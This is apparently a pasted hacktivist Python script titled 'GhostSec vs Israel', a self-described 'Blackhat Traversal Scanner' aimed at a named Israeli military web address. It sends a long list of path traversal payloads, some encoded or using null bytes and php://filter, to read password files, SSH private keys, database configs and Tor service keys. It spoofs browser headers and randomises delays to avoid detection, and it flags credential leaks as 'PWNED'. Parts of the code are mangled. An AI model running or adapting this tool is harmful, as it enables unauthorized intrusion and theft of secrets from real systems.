GhostSec vs Israel

1. import requests import logging import time import random import re
2.  
3. logging.basicConfig( filename="path_traversal_blackhat.log", level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s" )
4.  
5. TARGET_URL = "http://idf.co.il/media/design/underconstructionnotice.php?d="
6.  
7. COMMON_FILES = [ "../../../../etc/passwd", "../../../../etc/shadow", "../../../../var/log/auth.log", "../../../../home/user/.bash_history", "../../../../var/www/html/wp-config.php", "../../../../proc/self/cmdline", "../../../../root/.ssh/id_rsa", "../../../../var/spool/cron/crontabs/root", "../../../../etc/issue", "../../../../etc/network/interfaces", "php://filter/convert.base64-encode/resource=../../../../etc/passwd", "../../../../etc/passwd%00", "..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", "............\windows\win.ini", "../../../../.git/config", "../../../../.ssh/authorized_keys", "../../../../etc/hostname", "../../../../etc/mysql/my.cnf", "../../../../root/.bashrc", "../../../../root/.profile", "../../../../root/.viminfo", "../../../../var/mail/root", "../../../../var/lib/dpkg/status", "../../../../etc/nginx/nginx.conf", "../../../../etc/apache2/apache2.conf", "../../../../etc/php/7.4/apache2/php.ini", "../../../../proc/mounts", "../../../../proc/sched_debug", "../../../../var/log/syslog", "../../../../var/log/dmesg", "../../../../var/log/wtmp", "../../../../var/log/lastlog", "../../../../root/.bash_history", "../../../../home//.bash_history", "../../../../home//.ssh/id_rsa", "../../../../var/www/*/wp-config.php", "../../../../var/backups/passwd.bak", "../../../../var/backups/shadow.bak", "../../../../var/lib/mysql/mysql.sock", "../../../../etc/postfix/main.cf", "../../../../etc/postfix/master.cf", "../../../../var/lib/tor/hidden_service/hostname", "../../../../var/lib/tor/hidden_service/private_key" ]
8.  
9. HEADERS = { "User-Agent": random.choice([ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" ]), "Referer": random.choice([ "http://google.com", "http://bing.com", "http://yahoo.com", "http://duckduckgo.com" ]), "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8" }
10.  
11. def detect_sensitive_data(response_text): patterns = [ r"root:x:", r"DB_PASSWORD", r"ssh-rsa", r"BEGIN RSA PRIVATE KEY", r"<?php", r"nologin", r"admin", r"mysql_root_password", r"", r"listen = /var/run/php", r"server_name" ] return any(re.search(pattern, response_text) for pattern in patterns)
12.  
13. def analyze_response(response, full_url): if response.status_code == 200 and len(response.text) > 20: if detect_sensitive_data(response.text): logging.info(f"[PWNED] High-value target compromised: {full_url}") print(f"[PWNED] High-value target compromised: {full_url}") else: logging.info(f"[INFO] File accessible but requires further exploitation: {full_url}") print(f"[INFO] File accessible but requires further exploitation: {full_url}") else: logging.info(f"[FAILURE] This path resists intrusion: {full_url}") print(f"[FAILURE] This path resists intrusion: {full_url}")
14.  
15. def test_traversal(): for file in COMMON_FILES: full_url = TARGET_URL + file try: response = requests.get(full_url, headers=HEADERS, timeout=5) analyze_response(response, full_url) except requests.RequestException as e: logging.error(f"[ERROR] Recon failed for: {full_url} | Reason: {e}") print(f"[ERROR] Recon failed for: {full_url} | Reason: {e}") time.sleep(random.uniform(1, 3))
16.  
17. if name == "main": print("\n[] Blackhat Traversal Scanner Activated []\n") test_traversal() print("\n[] Operation Complete - Check Logs for Details []\n")
18.  
19.